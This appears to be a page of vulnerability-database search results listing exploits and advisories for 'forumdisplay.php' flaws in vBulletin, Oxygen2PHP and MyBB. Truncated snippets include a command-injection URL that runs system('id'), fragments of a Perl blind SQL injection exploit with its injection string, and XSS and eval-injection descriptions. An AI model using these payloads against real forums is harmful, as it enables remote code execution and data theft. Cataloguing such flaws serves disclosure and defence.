40 matches found
EUVD-2004-0323
Malware in sbrugna...
vBulletin <= 3.0.4 "forumdisplay.php" Code Execution
No description provided by source. Exploit: http://site/forumdisplay.php?GLOBALS=1&f=2&comma=.system'id'. Conditions: 1st condition: $vboptions['showforumusers'] == True, the admin must set showforumusers ON in vbulletin options. 2nd condition: $bbuserinfo['useri...
vBulletin <= 3.0.4 "forumdisplay.php" Code Execution (part 2)
No description provided by source. ?php / vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleebatuk2.net First condition: $vboptions['showforumusers'] == True, the admin must set showforumusers ON in vbulletin options. Second condition: $bbuserinfo['userid'] == 0, you must be a visitor/guest...
Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit
No description provided by source. !/usr/bin/perl 0-Day Oxygen2PHP = 1.1.3 forumdisplay.php Remote Blind SQL Injection Exploit Coded By Dante90, WaRWolFz Crew Bug Discovered By: Dante90, WaRWolFz Crew use strict; use LWP::UserAgent; use HTTP::Request::Common; use Time::HiRes; use IO::Socket; my...
vBulletin 3.0.0 XSS Vulnerability
No description provided by source. Title: vBulletin 3.0.0 XSS Author: Discovered by ROOTEGY Version: vBulletin Version 3.0.0 WWW.sec-war.com 3.0.0 - Introduction XSS scripts in the script search.php. I...
VBulletin 3.0 ForumDisplay.PHP Cross-Site Scripting Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/9888/info It has been reported that VBulletin is prone to a cross-site scripting vulnerability in the 'forumdisplay.php' script. This issue is reportedly due to a failure to sanitize user input and so allow for injection ...
MyBB 1.6 Path Disclosure
Vulnerability ID: HTB22654 Reference: http://www.htbridge.ch/advisory/pathdisclosureinmybb.html Product: MyBB Vendor: MyBB http://www.mybb.com Vulnerable Version: 1.6 Vendor Notification: 13 October 2010 Vulnerability Type: Path disclosure Status: Not Fixed, Vendor Alerted, Awaiting Vendor Respon...
vBulletin 4.0.4 Code Execution
Vulnerability vBulletin - http://www.vbulletin.org. Local or adserver Javascript, "forumdisplay.php" Code Execution. Version license 4.0.4. info set cookies, error issue & critical-information-disclosur...
vBulletin v4.0.4 adserver Javascript (forumdisplay.php) Code Execution
Exploit for php platform in category web applications. vBulletin v4.0.4 adserver Javascript forumdisplay.php Code Execution...
Oxygen2PHP 1.1.3 - 'forumdisplay.php' Blind SQL Injection
!/usr/bin/perl 0-Day Oxygen2PHP newGET = $Host; my $HTTP = new LWP::UserAgent; my $Referrer = "http://warwolfz.altervista.org/"; my $DefaultTime = request$Referrer; sub BlindSQLJnjection my $dec,$hex = @; return "./forumdisplay.php?fid=-1'+OR+1!=SELECT...
Oxygen2PHP <= 1.1.3 (forumdisplay.php) Blind SQL Injection Exploit
Exploit for php platform in category web applications. Oxygen2PHP newGET = $Host; my $HTTP = new LWP::UserAgent; my $Referrer = "http://warwolfz.altervista.org/"; my $DefaultTime = request$Referrer; sub BlindSQLJnjection my $dec,$h...
vBulletin 3.0.0 XSS Vulnerability
Exploit for unknown platform in category web applications. vBulletin 3.0.0 XSS Vulnerability. Title: vBulletin 3.0.0 XSS Author: Discovered by ROOTEGY Version: vBulletin Version 3.0.0 3.0.0 - Introduction XSS scripts in the script...
vBulletin 3.0.0 - Cross-Site Scripting
Title: vBulletin 3.0.0 XSS Author: Discovered by ROOTEGY Version: vBulletin Version 3.0.0 WWW.sec-war.com 3.0.0 - Introduction XSS scripts in the script search.php. In fact, a hole through a browser...
vBulletin 3.0.0 - Cross-Site Scripting
vBulletin 3.0.0 - Cross-Site Scripting Title: vBulletin 3.0.0 XSS Author: Discovered by ROOTEGY Version: vBulletin Version 3.0.0 WWW.sec-war.com 3.0.0 - Introduction XSS scripts in the script search.ph...
Oxygen2PHP 1.1.3 Blind SQL Injection
!/usr/bin/perl 0-Day Oxygen2PHP newGET = $Host; my $HTTP = new LWP::UserAgent; my $Referrer = "http://warwolfz.altervista.org/"; my $DefaultTime = request$Referrer; sub BlindSQLJnjection my $dec,$hex = @; return "./forumdisplay.php?fid=-1'+OR+1!=SELECT...
CVE-2008-0382
Multiple eval injection vulnerabilities in MyBB 1.2.10 and earlier allow remote attackers to execute arbitrary code via the sortby parameter to (1) forumdisplay.php or (2) a results action in search.php...
MyBB forumdisplay.php 'sortby' Parameter Arbitrary PHP Code Execution
The version of MyBB installed on the remote host is affected by an arbitrary PHP code execution vulnerability due to improper sanitization of user-supplied input to the 'sortby' parameter of the forumdisplay.php script before using it in an eval statement to evaluate PHP code. A remote,...
MyBB < 1.2.11 forumdisplay.php sortby Parameter Command Execution
Binary data 4346.prm...
[waraxe-2008-SA#061] - Remote Code Execution in MyBB 1.2.10
waraxe-2008-SA061 - Remote Code Execution in MyBB 1.2.10 Author: Janek Vind "waraxe" Independent discovery: koziolek Date: 16. January 2008 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-61.html Target...
MyBulletinBoard (MyBB) <= 1.2.10 Multiple Remote Vulnerabilities
Exploit for unknown platform in category web applications. MyBulletinBoard (MyBB) <= 1.2.10 Multiple Remote Vulnerabilities. waraxe-2008-SA061 - Remote Code Execution in My...